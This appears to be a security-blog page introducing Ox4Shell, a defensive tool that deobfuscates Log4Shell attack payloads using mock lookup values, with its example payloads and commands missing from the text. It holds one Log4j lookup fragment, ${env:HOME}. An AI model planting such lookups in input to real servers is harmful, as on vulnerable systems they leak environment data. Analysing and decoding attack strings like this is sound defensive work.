Wp Header Logo 101

Ox4Shell – Deobfuscate Log4Shell Payloads With Ease

Deobfuscate Log4Shell payloads with ease.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

After running Ox4Shell, it would transform into an intuitive and readable form:

After running Ox4Shell, the tool reveals the attacker’s intentions:

To run the tool simply:

Ox4Shell uses the mock.json file to insert common values into certain lookup function, for example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.

The default set of mock data provided is:

As an example, we can deobfuscate the following payload using the Ox4Shell’s mocking capability:

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.


Leave a Comment

Leave a Reply

Your email address will not be published.

A Detailed Guide on Hydra

Ropr – A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative

Containers Vulnerability Scanner: Trivy

ReconPal – Leveraging NLP For Infosec